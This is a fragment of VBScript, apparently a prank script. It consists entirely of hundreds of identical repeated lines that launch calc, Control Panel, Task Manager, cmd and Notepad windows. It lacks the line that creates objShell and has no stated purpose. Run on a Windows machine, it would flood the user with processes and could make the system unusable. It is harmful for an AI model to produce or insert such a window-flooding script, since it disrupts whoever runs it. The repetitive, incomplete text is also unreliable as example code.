
objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
